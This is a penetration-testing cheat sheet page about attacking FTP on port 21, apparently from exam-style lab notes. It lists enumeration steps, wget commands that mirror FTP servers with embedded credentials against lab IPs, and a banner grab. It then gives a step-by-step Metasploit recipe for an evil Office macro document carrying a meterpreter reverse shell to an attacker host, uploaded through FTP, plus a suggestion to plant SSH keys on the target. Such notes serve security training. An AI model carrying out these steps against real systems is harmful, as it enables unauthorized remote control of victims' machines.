FTP 21

Enumeration one liners

#Checklist

$ Anonymous login
$ OS version
$ Other software you can find on the machine (Prog Files, yum.log, /bin)
$ password files
$ DLLs for msfpescan / BOF targets
$ Do you have UPLOAD potential?
$ Can you trigger execution of uploads?
$ Swap binaries?
$ Public exploits for ftp server software

#download all dirs and files

wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'

#if PASV transfer is disabled

wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'

#If PASV is enabled

sudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'

#Grab FTP Banner via telnet

telnet -n 192.168.101.100 21

#Grab FTP Certificate if existing

#nmap ftp

#Connect with Browser

#Hydra Brute Force (Need Username)

#Msfconsole one liner

#Possibly upload kali generated ssh-keys and deploy into target, then ssh directly into user

#MS Office evil macro reverse shell (Uploaded on ftp)

First stage:

  1. msfconsole --→ search office macro

  2. use /multi/fileformat/office_word_macro --→ show options

  3. set meterpreter reverse listener

set payload windows/meterpreter/reverse_tcp

4)set listening host (kali) and disable payload handler

set lhost 192.168.119.177 #lport automatically set as 4444

set disablepayloadhandler false

run

Second stage:

File stored at : /home/kali/.msf4/local/msf.docm

1)Change extension from .docm to .doc sudo mv msf.docm msf.doc

2)Start meterpreter listener

set payload windows/meterpreter/reverse_tcp set exitonsession false set lhost 192.168.119.177 set lport 4444 run -j

2)use put command to upload ftp 10.10.10.10 21 put msf.doc exit

3)Catch meterpreter session

PreviousEnumerationNextSSH 22

Last updated